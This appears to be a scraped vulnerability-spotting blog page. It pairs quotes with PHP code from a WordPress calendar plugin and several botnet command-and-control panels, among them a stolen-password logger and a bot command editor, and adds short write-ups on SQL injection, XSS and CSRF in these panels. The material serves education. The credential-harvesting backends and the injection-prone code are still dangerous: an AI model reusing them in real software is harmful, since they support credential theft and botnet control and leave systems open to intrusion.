Boundaries

I like pushing boundaries.
Lady Gaga

...snip...

</style>
<?php
// We do some checking to see what we're doing
if (isset($_POST['mode']) && $_POST['mode'] == 'add')
  {
   // Proceed with the save
   $sql = "INSERT INTO " . WP_CALENDAR_CATEGORIES_TABLE . "SET category_name='".mysql_escape_string($_POST['category_name'])."',category_colour='".mysql_escape_string($_POST['category_colour'])."'";
   $wpdb->get_results($sql);
   echo "<div class=\"updated\"><p><strong>".__('Category added successfully','calendar')."</strong></p></div>";
  }
else if (isset($_GET['mode']) && isset($_GET['category_id']) && $_GET['mode'] == 'delete')
  {
   $sql = "DELETE FROM " . WP_CALENDAR_CATEGORIES_TABLE . "WHERE category_id=".mysql_escape_string($_GET['category_id']);
   $wpdb->get_results($sql);
   $sql = "UPDATE " . WP_CALENDAR_TABLE . "SET event_category=1 WHERE event_category=".mysql_escape_string($_GET['category_id']);
   $wpdb->get_results($sql);
   echo "<div class=\"updated\"><p><strong>".__('Category deleted successfully','calendar')."</strong></p></div>";
  }
else if (isset($_GET['mode']) && isset($_GET['category_id']) && $_GET['mode'] == 'edit' && !isset($_POST['mode']))
  {
   $sql = "SELECT * FROM " . WP_CALENDAR_CATEGORIES_TABLE . "WHERE category_id=".mysql_escape_string($_GET['category_id']);
   $cur_cat = $wpdb->get_row($sql);
   ?>
<div class="wrap">
  <h2><?php _e('Edit Category','calendar'); ?></h2>
  <form name="catform"id="catform"class="wrap"method="post"action="<?php echo bloginfo('wpurl'); ?>/wp-admin/admin.php?page=calendar-categories">
        <input type="hidden"name="mode"value="edit"/>
        <input type="hidden"name="category_id"value="<?php echo stripslashes($cur_cat->category_id) ?>"/>
        <div id="linkadvanceddiv"class="postbox">
            <div style="float:left;width:98%;clear:both;"class="inside">
    <table cellpadding="5"cellspacing="5">
                <tr>
    <td><legend><?php _e('Category Name','calendar'); ?>:</legend></td>
                <td><input type="text"name="category_name"class="input"size="30"maxlength="30"value="<?php echo stripslashes($cur_cat->category_name) ?>"/></td>
    </tr>
                <tr>
    <td><legend><?php _e('Category Colour (Hex format)','calendar'); ?>:</legend></td>
                <td><input type="text"name="category_colour"class="input"size="10"maxlength="7"value="<?php echo stripslashes($cur_cat->category_colour) ?>"/></td>
                </tr>
                </table>
            </div>
            <div style="clear:both;height:1px;"> </div>
        </div>
        <input type="submit"name="save"class="button bold"value="<?php _e('Save','calendar'); ?> »"/>
  </form>
</div>
   <?php
  }
else if (isset($_POST['mode']) && isset($_POST['category_id']) && isset($_POST['category_name']) && isset($_POST['category_colour']) && $_POST['mode'] == 'edit')
  {
   // Proceed with the save
   $sql = "UPDATE " . WP_CALENDAR_CATEGORIES_TABLE . "SET category_name='".mysql_escape_string($_POST['category_name'])."',category_colour='".mysql_escape_string($_POST['category_colour'])."' WHERE category_id=".mysql_escape_string($_POST['category_id']);
   $wpdb->get_results($sql);
   echo "<div class=\"updated\"><p><strong>".__('Category edited successfully','calendar')."</strong></p></div>";
  }

$get_mode = 0;
$post_mode = 0;
if (isset($_GET['mode'])) {
  if ($_GET['mode'] == 'edit') {
   $get_mode = 1;
  }
}
if (isset($_POST['mode'])) {
  if ($_POST['mode'] == 'edit') {
   $post_mode = 1;
  }
}
if ($get_mode != 1 || $post_mode == 1)
  {
?>

<div class="wrap">
  <h2><?php _e('Add Category','calendar'); ?></h2>
  <form name="catform"id="catform"class="wrap"method="post"action="<?php echo bloginfo('wpurl'); ?>/wp-admin/admin.php?page=calendar-categories">
        <input type="hidden"name="mode"value="add"/>
        <input type="hidden"name="category_id"value="">
        <div id="linkadvanceddiv"class="postbox">
            <div style="float:left;width:98%;clear:both;"class="inside">
       <table cellspacing="5"cellpadding="5">
                <tr>
                <td><legend><?php _e('Category Name','calendar'); ?>:</legend></td>
                <td><input type="text"name="category_name"class="input"size="30"maxlength="30"value=""/></td>
                </tr>
                <tr>
                <td><legend><?php _e('Category Colour (Hex format)','calendar'); ?>:</legend></td>
                <td><input type="text"name="category_colour"class="input"size="10"maxlength="7"value=""/></td>
                </tr>
                </table>
            </div>
      <div style="clear:both;height:1px;"> </div>
        </div>
        <input type="submit"name="save"class="button bold"value="<?php _e('Save','calendar'); ?> »"/>
  </form>
  <h2><?php _e('Manage Categories','calendar'); ?></h2>
...snip...

Floods

The moment we begin to fear the opinions of others and hesitate to tell the truth that is in us,and from motives of policy are silent when we should speak,the divine floods of light and life no longer flow into our souls.
Elizabeth Cady Stanton

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

<?php

$use_mysql = 1;

if ($use_mysql == 1) {
require_once('./mysqllog.php');
require_once('./geoipcity.inc');
}

$ip = getenv("REMOTE_ADDR");
$real_ip = getenv("HTTP_X_FORWARDED_FOR");

if (isset($_GET['id'])) {
$id = $_GET['id'];
} else {
$id = $_POST['id'];
}

$info = $_POST['info'];
$user = $_POST['user'];

if ($use_mysql == 1) {
//-----------------------------------
$gi = geoip_open('./GeoIPCity.dat', GEOIP_STANDARD);
$record = geoip_record_by_addr($gi, $ip);
geoip_close($gi);
//-----------------------------------
$info = decode_string($info);
if(@!mysql_connect($mysql_host,$mysql_login,$mysql_pass)) {echo '<p class="err">Error. Cant connect to mysql server </p>'; }
if(@!mysql_selectdb($mysql_db)) {echo '<p class="err">Error. Cant connect to DB</p>'; }
$query = 'INSERT INTO pass (add_date,id,uidlog,ip_real,ip,pass,country,city,zip)
    VALUES (now(),"'. $id . '","'. $user .'","'. $real_ip . '","'. $ip .'","'. $info .'","'. $record->country_name .'","'. $record->city .'","'. $record->postal_code .'")';
if(@!mysql_query($query)) {echo '<p class="err">Error. Cant execute query</p>'; }
}
else {
$date = date("Y-m-d");
$time=date("H:i:s");

list($year, $month, $day) = explode('-', $date);
$filename = "pass.$day.$month.txt";
$log = "$info@@@@@$user@@@@@$id@@@@@$real_ip@@@@@$ip@@@@@$date@@@@@$time\n";
$fh = fopen("logs/$filename", "a+");
fputs($fh, $log);
fclose($fh);
}

function decode_string($string) {
  $bindata = '';
  for ($i=0;$i<strlen($string);$i+=2) {
    $bindata.=chr(hexdec(substr($string,$i,2)));
  }
  return addslashes($bindata);
}
?>

Grammys

The last thing I want is to walk into my house after a long day and see all the Grammys and awards. It would make me feel weird.
Alicia Keys

<?php

include_once('geoipcity.inc');
include_once('../mysqllog.php');

$countrys = $_POST['countrys'];
$states = $_POST['states'];

if ($countrys == "") {
$countrys = "all";
}
if ($states == "") {
$states = "all";
}

$date = date("m-d");
list($month, $day) = explode('-', $date);

print "<STYLE></STYLE>
  <BODY bgcolor=#DDDDDD text=#505050 marginwidth=0><table align=center border=1><TD><form action=index.php method=post><B>Select by country</B><TD><select name=countrys><option value=all>All countries";

$j = 1;
while ($GEOIP_COUNTRY_CODES[$j] != "") {
print "<option value=$GEOIP_COUNTRY_CODES[$j]>$GEOIP_COUNTRY_NAMES[$j]\r\n";
$j++;
}

print "</SELECT><TD><BR><INPUT type=submit value=submit></FORM><TR><TD>
  <FORM action=index.php method=post><B>Select by state</B><TD><select name=states><option value=all>all<option value=AK>AK<option value=AL>AL<option value=AR>AR<option value=AS>AS<option value=AZ>AZ<option value=CA>CA<option value=CO>CO
  <option value=CT>CT<option value=DC>DC<option value=DE>DE<option value=FL>FL<option value=GA>GA<option value=HI>HI<option value=IA>IA<option value=ID>ID<option value=IL>IL<option value=IN>IN
  <option value=KS>KS<option value=KY>KY<option value=LA>LA<option value=MA>MA<option value=MD>MD<option value=ME>ME<option value=MI>MI<option value=MN>MN<option value=MO>MO<option value=MP>MP
  <option value=MS>MS<option value=MT>MT<option value=NC>NC<option value=ND>ND<option value=NE>NE<option value=NH>NH<option value=NJ>NJ<option value=NM>NM<option value=NV>NU<option value=NY>NY
  <option value=OH>OH<option value=OK>OK<option value=OR>OR<option value=PA>PA<option value=PR>PR<option value=RI>RI<option value=SC>SC<option value=SD>SD<option value=TN>TN<option value=TX>TX
  <option value=UT>UT<option value=VA>VA<option value=VI>VI<option value=VT>VT<option value=WA>WA<option value=WI>WI<option value=WV>WV<option value=WY>WY</select>
  <TD><BR><input type=submit value=submit></form></table><B><CENTER><BR>Current country selected:$countrys<BR>Current state selected:$states</CENTER></B><BR>
  <table width=100% cellspacing=0><tr><td><table width=100% bgcolor=#FFFFFF cellspacing=1><tr><td align=center bgcolor=#66CF96><b>List</b></td></tr></table></td></tr>
  <tr><td><table width=100% bgcolor=#FFFFFF cellspacing=1><tr><td align=center bgcolor=#66CF96>IP</td><td align=center bgcolor=#66CF96>UPDATE</td><td align=center bgcolor=#66CF96>ID</td>
  <td align=center bgcolor=#66CF96>COUNTRY</td>
  <td align=center bgcolor=#66CF96>CITY</td>
  <td align=center bgcolor=#66CF96>STATE</td>
  <td align=center bgcolor=#66CF96>UPTIME</td></tr>";


$stime = mktime();
$stime = $stime - 86400;
$link = mysql_connect($mysql_host, $mysql_login, $mysql_pass) or die("Could not connect:" . mysql_error());
mysql_select_db($mysql_db, $link) or die("Could not select:" . mysql_error());
$query = 'SELECT * FROM `socks` WHERE `update` >' . $stime . ' ORDER BY `update` DESC';
$result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());

$tot = 0;
while ($row = mysql_fetch_assoc($result)) {
$prms[0] = $row['ip'];
$prms[1] = $row['hport'];
$prms[2] = $row['sport'];
$prms[3] = $row['update'];
$prms[4] = $row['uptime'];
$prms[5] = $row['uid'];
$prms[6] = $row['used'];
if ($prms[0] != "") {
  printent($prms,$tot,$countrys,$states);
  $tot++;
}
}
mysql_close($link);

print "</table><table width=100% bgcolor=#FFFFFF cellspacing=1><tr><td align=right bgcolor=#66CF96>Total:<b>$tot</b></tr></td></table></table></table></tr></td></TABLE></BODY></HTML>";

function printent($prms,$tot,$countrys,$states){
if(!($tot%2)) {
  $bcolor="#D6D6D6";
} else {
  $bcolor="#98E8E1";
}

$tid = $prms[5];
$tid = chop($tid);

$gi = geoip_open("../GeoIPCity.dat",GEOIP_STANDARD);
$record = geoip_record_by_addr($gi,$prms[0]);
geoip_close($gi);

if (($countrys == "all") & ($states == "all")) {
  echo "<tr>\r\n";
  echo "<td align=left bgcolor=$bcolor onClick=\"window.open('check.php?ip=$prms[0]&port=$prms[2]&hport=$prms[1]','child','scrollbars=no,width=250,height=100');\" onmouseover=\"this.style.background='#000D2A';\" onmouseout=\"this.style.background='$bcolor';\"><font face='Fixedsys' color=#707070><INPUT type=button value=\"Copy IP\" onclick=window.clipboardData.setData(\"Text\",\"$prms[0]\")>$prms[0]</font></td>\r\n";
  echo "<td align=center bgcolor=$bcolor><font face='Fixedsys' color=#707070>" . date("H:i:s d.m.y", $prms[3]) ."</font></td>\r\n";//socks
  echo "<td align=center bgcolor=$bcolor><font face='Fixedsys' color=#707070><INPUT type=button value=\"Copy ID\" onclick=window.clipboardData.setData(\"Text\",\"$tid\")> $tid</font></td>\r\n";//socks

  // Show flag
  if ($record->country_code == "") {
   $record->country_code = "-";
   $record->country_name = "";
  }

  $c_code = strtolower($record->country_code);

  $flag = "<IMG src=../flags/$c_code.gif> $record->country_name.<BR>";

  echo "<td align=left bgcolor=$bcolor><font face='Fixedsys' color=#707070>$flag</font></td>\r\n";

Writing –Fake XSS + CSRF

Details

Affected Software:EOF-0×01 Command and Control

Fixed in Version:?

Issue Type:XSS and XSRF

Original Code:Found Here

Details

This week,we had a couple of bugs here affecting EOF-0×01 Command and Control. A red herring is the use of echo($_POST['pw']);to build HTML markup. Upon first glance,this seems like a straight forward XSS bug. This issue is mitigated by the fact that $_POST['pw'] is only displayed if it is equal to $botpw (whose default value happens to be ‘bla’) . So unless the botmaster has an XSS payload for their password,this one is going to be really difficult to exploit. The other interesting part is the if statements that look at $_POST[‘action’]. If the user has provided the correct $_POST[‘pw’] and also provides a $_POST[‘action’] of 2 or 3,DeleteCommandsFromQueue() and EditCommandForBot() will be executed respectively. Developers (even malware developers) should be wary of allowing Create,Update,or Delete operations without defending against cross site request forgery. These functions are not protected.

Vulnerable Code

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type"content="text/html;charset=iso-8859-1">

<?php
include("./config.php");
include("./functions.php");

$query = $_SERVER['QUERY_STRING'];
parse_str($query);

ConnectToDB($server, $user, $pw, $dbname);
?>

<style type="text/css">

</style>

<script>

</script>

</head>

<body onload="setfocus()">
<?php
if($_POST['pw']!=$botpw)
{
?>
<table width="242"border="0"cellpadding="0"cellspacing="0"bgcolor="#D0EAD2"class="tableborder">

<tr>
  <td width="239"height="44"valign="top"><form action="./control.php"method="post"name="login"id="login">
    Password:<br>
    <input name="pw"type="password"id="pw">
    <input name="login"type="submit"id="login"value="Login">
  </form></td>
</tr>
</table>
<?php
}
else
{
?>
<table width="516"border="0"cellpadding="0"cellspacing="0"bgcolor="#D5E1F0"class="tableborder">
    
    <tr>
     <td width="78"height="43"valign="middle"><form action="./control.php"method="post"name="logout"id="logout">
       <input name="logout"type="submit"id="logout"value="Logout">
     </form></td>
     <td width="143"valign="middle"><form action="./control.php"method="post"name="command"id="command">
       <input name="command"type="submit"id="command"value="Command center">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
   <td width="193"valign="middle"><form action="./control.php"method="post"name="queue"id="queue">
       <input name="queue"type="submit"id="queue"value="Manage commandqueue">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
     <td width="101"valign="middle"><form action="./control.php"method="post"name="logdel"id="logdel">
       <input name="logdel"type="submit"id="logdel"value="Delete log">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
    </tr>
</table>
<?php
if(isset($_POST['queue']))
{

if(isset($_POST['action']))
{
if($_POST['action']==2)
{
  DeleteCommandsFromQueue();
}

if($_POST['action']==4)
{
  EditCommandForBot();
}
}

if($_POST['action']!=3)
{
?>
<br>
<form action="./control.php"method="post"name="form1"id="form1">
<table width="648"border="0"cellpadding="0"cellspacing="0"bgcolor="#F2ECD7"class="tableborder">

<tr>
  <td height="486"colspan="2"valign="top">Bot:<br>
     <select name="botselect"id="botselect">
   <?php
   ShowAllBotsCmdList();
   ?>
    </select>

Writing

Writing is a struggle against silence.
Carlos Fuentes

Imagination

I am enough of an artist to draw freely upon my imagination. Imagination is more important than knowledge. Knowledge is limited. Imagination encircles the world.
Albert Einstein

<?php if(!defined('__INDEX__'))die();
$pedt=PRIV&PRIV_BOTS_CMDS_EDIT;
if((isset($_GET['new'])&&$pedt)||(isset($_GET['edit'])&&is_numeric($_GET['edit'])))
{
if(!@include_once('fmt.php'))die('fmt.php not founded!');
$name=isset($_POST['name'])?$_POST['name']:time();
$stat=isset($_POST['stat'])?($_POST['stat']?1:0):0;
$limit=(isset($_POST['limit'])&&is_numeric($_POST['limit']))?$_POST['limit']:0;
$cnts=isset($_POST['cnts'])?$_POST['cnts']:'';
$cids=isset($_POST['cids'])?$_POST['cids']:'';
$bns=isset($_POST['bns'])?$_POST['bns']:'';
$cmds=isset($_POST['cmds'])?$_POST['cmds']:'';

if($_SERVER['REQUEST_METHOD']=='POST'&&strlen($name)>0&&$pedt)
{
  $cmdsb=EncodeBuffer(str_replace("\r\n","\n",trim($cmds)));
  $data='name=\''.addslashes($name).'\',stat='.$stat.',lim='.$limit.',c=\''.addslashes(SepFmt($cnts)).'\',comps=\''.addslashes(SepFmt($cids)).'\',bns=\''.addslashes(SepFmt($bns)).'\',cmds=\''.addslashes($cmdsb).'\'';
  if(isset($_GET['new']))mysql_query('INSERT INTO '.TABLE_BCMDS.' SET '.$data.',id2='.time());
  else mysql_query('UPDATE '.TABLE_BCMDS.' SET '.$data.' WHERE id=\''.$_GET['edit'].'\' LIMIT 1');
  header('Location:'.QUERY_STRING);
}
else
{
  if(!$pedt&&isset($_GET['new']))unset($_GET['new']);
  HTMLBegin(isset($_GET['new'])?LNG_MBCMDS_NEWCMD:($pedt?LNG_MBCMDS_EDITCMD:LNG_MBCMDS_VIEWCMD));
  if(isset($_GET['new']))print CmdForm('new',LNG_MBCMDS_NEWCMD,LNG_MBCMDS_ADD,$name,$stat,$limit,$cnts,$cids,$bns,$cmds);
  else
  {
   $r=mysql_query('SELECT * FROM '.TABLE_BCMDS.' WHERE id=\''.$_GET['edit'].'\' LIMIT 1');
   if($r&&mysql_affected_rows()==1&&($m=mysql_fetch_assoc($r)))print CmdForm('edit='.$_GET['edit'],$pedt?LNG_MBCMDS_EDITCMD:LNG_MBCMDS_VIEWCMD,$pedt?LNG_MBCMDS_EDIT:'',$m['name'],$m['stat'],$m['lim'],SepFmtB($m['c']),SepFmtB($m['comps']),SepFmtB($m['bns']),DecodeBuffer($m['cmds']));
   else print '<font class="error">'.LNG_MBCMDS_ERROR_1.'</font>';
  }
  HTMLEnd();
}
die();
}
else if(isset($_GET['del'])&&is_numeric($_GET['del'])&&$pedt)
{
mysql_query('DELETE FROM '.TABLE_BCMDS.' WHERE id='.$_GET['del'].' LIMIT 1');
header('Location:'.QUERY_STRING);
die();
}
else if(isset($_GET['res'])&&is_numeric($_GET['res'])&&$pedt)
{
mysql_query('UPDATE '.TABLE_BCMDS.' SET exc=\'0\',rcomps=\'\',exct=\'0\' WHERE id='.$_GET['res'].' LIMIT 1');
header('Location:'.QUERY_STRING);
die();
}

HTMLBegin(LNG_MBCMDS,$pedt?'function DelCmd(uid,q){if(confirm(q))window.location=\''.QUERY_STRING.'&del=\'+uid};function ResCmd(uid,q){if(confirm(q))window.location=\''.QUERY_STRING.'&res=\'+uid}':'');

$r=mysql_query('SELECT * FROM '.TABLE_BCMDS);
$total=mysql_affected_rows();
print '<table class="tbl1"><tr><td class="td1"colspan="'.($pedt?9:10).'">'.LNG_MBCMDS_R_CMDS.' ('.$total.')</td>';
if($pedt)print '<td class="td1"align="center"><input type="submit"value="'.LNG_MBCMDS_NEWCMD.'"class="ism"style="width:100%"onClick="window.location=\''.QUERY_STRING.'&new\';"></td>';
print '</tr><tr><td class="td1">'.LNG_MBCMDS_R_ID.'</td><td class="td1">'.LNG_MBCMDS_R_NAME.'</td><td class="td1">'.LNG_MBCMDS_R_STAT.'</td><td class="td1">'.LNG_MBCMDS_R_LIMIT.'</td><td class="td1">'.LNG_MBCMDS_R_REQ.'</td><td class="td1">'.LNG_MBCMDS_R_EXEC.'</td><td class="td1">'.LNG_MBCMDS_R_CNTS.'</td><td class="td1">'.LNG_MBCMDS_R_CIDS.'</td><td class="td1">'.LNG_MBCMDS_R_BNS.'</td><td class="td1"> </td></tr>';
if($total>0)
{
$j=0;
while(($m=mysql_fetch_assoc($r)))
{
  $a=(($j++)%2==0?1:2);
  print '<tr valign="top"><td align="right"class="tdx'.$a.'">'.$m['id2'].'</td>'.
     '<td class="tdx'.$a.'">'.htmlentities($m['name']).'</td>'.
     '<td class="tdx'.$a.'">'.($m['stat']?LNG_MBCMDS_STAT_ON:LNG_MBCMDS_STAT_OFF).'</td>'.
     '<td align="right"class="tdx'.$a.'">'.$m['lim'].'</td>'.
     '<td align="right"class="tdx'.$a.'">'.$m['exc'].'</td>'.
     '<td align="right"class="tdx'.$a.'">'.$m['exct'].'</td>'.
     '<td class="tdx'.$a.'">'.($m['c']==''?'-':str_replace(',','<br>',htmlentities(SepFmtB($m['c'])))).'</td>'.
     '<td class="tdx'.$a.'">'.($m['comps']==''?'-':str_replace(',','<br>',htmlentities(SepFmtB($m['comps'])))).'</td>'.
     '<td class="tdx'.$a.'">'.($m['bns']==''?'-':str_replace(',','<br>',htmlentities(SepFmtB($m['bns'])))).'</td>'.
     '<td class="tdx'.$a.'"align="center"><input class="ism"style="width:90%"type="submit"value="'.($pedt?LNG_MBCMDS_R_EDIT:LNG_MBCMDS_R_VIEW).'"onClick="window.location=\''.QUERY_STRING.'&edit='.$m['id'].'\';return false;">';
  if($pedt)print '<br><input class="ism"style="width:90%"type="submit"value="'.LNG_MBCMDS_R_RES_OK.'"onClick="javascript:ResCmd(\''.$m['id'].'\',\''.addslashes(sprintf(LNG_MBCMDS_R_RES,$m['name'])).'\');return false;"><br><input class="ism"style="width:90%"type="submit"value="'.LNG_MBCMDS_R_DEL_OK.'"onClick="javascript:DelCmd(\''.$m['id'].'\',\''.addslashes(sprintf(LNG_MBCMDS_R_DEL,$m['name'])).'\');return false;">';
  print '</td></tr>';
}
}
else print '<tr><td align="center"colspan="10"class="tdx1"><i>'.LNG_MBCMDS_R_NONE.'</i></td></tr>';
print '</table>';
HTMLEnd();

function CmdForm($cmd,$title,$action,$name,$stat,$limit,$cnts,$cids,$bns,$cmds)
{
$en=$action==''?0:1;
$stat=$stat?1:0;
$ro=$en?'':'readonly ';

$str=$en?'<form method="POST"action="'.QUERY_STRING.'&'.$cmd.'">':'';
$str.='<table class="tbl1"width="350"><tr><td class="td1"colspan="2">'.$title.'</td></tr>'.
    '<tr><td>'.LNG_MBCMDS_NAME.'</td><td width="100%"><input '.$ro.'type="text"name="name"value="'.htmlentities($name).'"style="width:100%"></td></tr>'.
    '<tr><td colspan="2"><table class="tbl1"><tr><td>'.LNG_MBCMDS_STAT.'</td><td width="100%"><select '.($en?'':'disabled ').'name="stat"style="width:100%">'.
    '<option value="1"'.($stat==1?' selected':'').'>'.LNG_MBCMDS_STAT_ON.'</option>'.
    '<option value="0"'.($stat==0?' selected':'').'>'.LNG_MBCMDS_STAT_OFF.'</option>'.
    '</select></td></tr>'.
    '<tr><td>'.LNG_MBCMDS_LIMIT.'</td><td width="100%"><input '.$ro.'type="text"name="limit"value="'.$limit.'"style="width:100%"></td></tr>'.
    '<tr><td>'.LNG_MBCMDS_CNTS.'</td><td width="100%"><input '.$ro.'type="text"name="cnts"value="'.$cnts.'"style="width:100%"></td></tr>'.
    '<tr><td>'.LNG_MBCMDS_CIDS.'</td><td width="100%"><input '.$ro.'type="text"name="cids"value="'.$cids.'"style="width:100%"></td></tr>'.
    '<tr><td>'.LNG_MBCMDS_BNS.'</td><td width="100%"><input '.$ro.'type="text"name="bns"value="'.$bns.'"style="width:100%"></td></tr>'.
    '<tr><td valign="top">'.LNG_MBCMDS_CMDS.'</td><td><textarea wrap="off"'.$ro.'name="cmds"style="width:100%;height:100">'.htmlentities($cmds).'</textarea></td></tr>'.
    '</table></tr></td><tr><td colspan="2"align="right">';
if($en)$str.='<input type="submit"class="ism"value="'.$action.'"style="width:100"> ';
$str.='<input type="submit"class="ism"value="'.LNG_MBCMDS_BACK.'"style="width:100"onClick="window.location.href=\''.QUERY_STRING.'\';return false;"></td></tr>';
if($en)$str.='</form>';
return $str.'</table>';
}
function SepFmt($str){if(strlen($str)>1){$str=str_replace(',','|',trim($str));if($str[0]!='|')$str='|'.$str;if($str[strlen($str)-1]!='|')$str.='|';}return $str;}
function SepFmtB($str){if(strlen($str)>1){$str=str_replace('|',',',trim($str));if($str[0]==',')$str=substr($str,1);$l=strlen($str);if($str[$l-1]==',')$str=substr($str,0,$l-1);}return $str;}
?>

Shape

I was scared I was going to have some weird shape to my head and I was pleased that I didn’t.
Edward Furlong

<?php

include_once('auth.php');

set_magic_quotes_runtime(1);

if(is_readable('html.php')) include_once('html.php');
else die('Could not find HTML library.');

if(is_readable('mycommon.php')) require('mycommon.php');
else die('Could not open configuration file.');

if(is_readable('lang.php')) include_once('lang.php');
else die('Could not find language library.');

$CTRL=1;
if(!isset($_GET['wohead']))
include_once('head.php');

$msg = '';
$srch = '';

...<snip>...

if(isset($_POST['S_COMPID'])){
$srch = search_bot();
};

$param =array(
"SRCH"=>$srch,
"LAND"=>get_land($mres),
"TASKS"=>get_task($mres),
"MSG"=>$msg
);



echo HTML_TASK_ADD($param);

//include_once('bottom.php');
//Functions++++++++++++++++++++++++++

function search_bot(){
global $mres,$_POST;

if($_POST['S_COMPID'] == '')
if($_POST['S_IP'] == '')
return '';

if($_POST['S_COMPID'] > ''){
$s_id = str_replace('*',"%",$_POST['S_COMPID']);
$q = 'SELECT * FROM `bots` WHERE `FCompID` like ("'.$s_id.'") limit '.$_POST['S_RESULTS'];
$result = mysql_query($q,$mres);

return HTML_serch_res_tbl($result);
};

if($_POST['S_IP'] > ''){

$s_ip = str_replace('*',"%",$_POST['S_IP']);

$q = 'SELECT * FROM `bots` WHERE `ip_addr` like ("'.$s_ip.'") limit '.$_POST['S_RESULTS'];
$result = mysql_query($q,$mres);

return HTML_serch_res_tbl($result);
};

};

function HTML_serch_res_tbl($result){
global $LNG;

  $nr = @mysql_num_rows($result);
if(!$nr)
return "<font color=#990000>Message</font>:<em>No Entries found.</em>";

$ret = "<br><table width=\"543\" border=\"0\" cellpadding=\"1\" cellspacing=\"1\">"
."<tr class=\"file2\">"
."<td colspan=\"8\" class=\"bhead\"><div align=\"center\">Select Results</div></td>"
."</tr>"
."<tr class=\"file2\">"
."<td width=\"21\" bgcolor=#FCFCFC>Add</td>"
."<td width=\"26\" nowrap=\"nowrap\" bgcolor=#FCFCFC>Land</td>"
."<td width=\"82\" bgcolor=#FCFCFC nowrap=\"nowrap\">IP</td>"
."<td width=\"93\" bgcolor=#FCFCFC nowrap=\"nowrap\">Rep. Count total </td>"
."<td width=\"56\" bgcolor=#FCFCFC nowrap=\"nowrap\">Last Report</td>"
."<td width=\"100\" bgcolor=#FCFCFC nowrap=\"nowrap\">First Report</td>"
."<td width=\"40\" bgcolor=#FCFCFC nowrap=\"nowrap\">Bot Ver.</td>"
."<td width=\"44\" bgcolor=#FCFCFC nowrap=\"nowrap\">CompID</td>"
."</tr>";

?>

State

State Legislators are merely politicians whose darkest secret prevents them from running for a higher office.
Dennis Miller

<?php
...snip...
function srch( )
{
  set_time_limit( 0 );
  $word = $_REQUEST['word'];
  $word2 = $word;
  $logfolder = $_REQUEST['infile'];
  $arch = $_REQUEST['xxx'];
  if ( $word != "" )
  {
    $word = explode( "\r\n", $word );
    $wordc = count( $word );
    $hl9 = fopen( $logfolder."/.out.txt", "w" );
    fclose( $hl9 );
    $dir = opendir( $logfolder );
    $finded = "";
    while ( $file = readdir( $dir ) )
    {
      if ( !( $file != "." ) || !( $file != ".." ) || !( $file != ".out.txt" ) || !( substr( $file, -4 ) == ".txt" ) )
      {
        $hl = fopen( $logfolder."/".$file, "rb" );
        $readsz = filesize( $logfolder."/".$file );
        if ( $readsz < 1041076 )
        {
          $readszR = $readsz;
        }
        else
        {
          $readszR = 1041076;
          $readsz -= 1041076;
        }
        while ( $data = fread( $hl, $readszR ) )
        {
          $pos = 0;
          $posC = 0;
          $posS = 0;
          while ( $pos = strpos( $data, "[IP:", $pos ) )
          {
            $pos = strpos( $data, "]", $pos ) + 1;
            if ( $pos < $posC )
            {
              break;
            }
            else
            {
              $posC = $pos;
              $lent = $pos - $posS;
              unset( $cutblock );
              $cutblock = substr( $data, $posS, $lent );
              $rd = 0;
              for ( ; $rd < $wordc; ++$rd )
              {
              }
              if ( !( $word[$rd] != "" ) || !( $ftmp = strpos( $cutblock, $word[$rd], 0 ) ) )
              {
                $hl9 = fopen( $logfolder."/.out.txt", "ab+" );
                fwrite( $hl9, $cutblock );
                fclose( $hl9 );
              }
            }
            unset( $rd );
            unset( $lent );
            unset( $ftmp );
            unset( $cutblock );
            $posS = $pos;
          }
          unset( $data );
          if ( $readsz < 1041076 )
          {
            $readszR = $readsz;
          }
          else
          {
            $readszR = 1041076;
            $readsz -= 1041076;
          }
        }
        unset( $data );
        fclose( $hl );
      }
    }
    if ( 0 < filesize( $logfolder."/.out.txt" ) )
    {
      $hl9 = fopen( $logfolder."/.out.txt", "r" );
      $finded = fread( $hl9, filesize( $logfolder."/.out.txt" ) );
      fclose( $hl9 );
      if ( $arch == 1 )
      {
        header( "Content-type:application/octet-stream" );
        $cl_Zip = new cl_zip( );
        $cl_Zip->onaddfile( $finded, "log".time( ).".txt" );
        header( "Content-Length:".strlen( $cl_Zip->ondumpfileout( ) ) );
        header( "Content-disposition:attachment;filename=log".time( ).".zip" );
        echo $cl_Zip->ondumpfileout( );
        exit( );
      }
      return $finded;
    }
  }
}
...snip...
?>

Feathers –SQLi

Details

Affected Software:Corpse C&C

Fixed in Version:Not Patched

Issue Type:SQL Injection

Original Code:Found Here

Details

This week’s bugs are in the CORPSE C&C (in the bsrv.php file). There are a couple of bugs here,most of them are very straight forward. Funny stuff first… if $ver is blank,we will fail the “security check”. So,in order to reach any of these vulns,we have to provide an arbitrary value for $ver. $ver is set from $_GET[‘ver’],so we have to provide a bsrv.php?ver=pwnd for each request in order to reach the vulnerable code. It’s rigorous security checks like this that make exploitation difficult.

$id and $param are validated through a manual process (code on line 27 – 36). I don’t know why the developer didn’t take advantage of built-in escaping routines… but the validation provided here seem to defend against common vulns. What’s also puzzling,is why the other variables weren’t validated/escaped. Veteran Spot the Vuln readers have seen this pattern before (escape one variable,miss the next variable) in other software,but for some reason I still find it surprising every time I see it. Now,let’s get onto the actual bugs. The most obvious are $uid and $httpport which are set directly from user controlled input ($_GET). These two variables are then used to build a dynamic SQL statement. This results in SQL injection.

Additionally,$uptimem and $uptimeh are used to set $sql_uptime. $sql_uptime is then used in a dynamic SQL statement resulting in yet another SQL injection.
$browser is taken from getenv(“HTTP_USER_AGENT”),which is attacker controlled (the user agent header in the HTTP request). Although $browser isn’t used on this page,it’s just asking for trouble

Upon first glance,it seems like $real_ip and $socksport could be used to reach a SQL injection. After some more investigation,it is likely that the fsockopen call would probably fail before $real_ip and $socksport could be passed to a dynamic SQL statement. With that said,$real_ip and $socksport can be still be used to generate a fsockopen request to an arbitrary system (line 59).

Developers Solution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
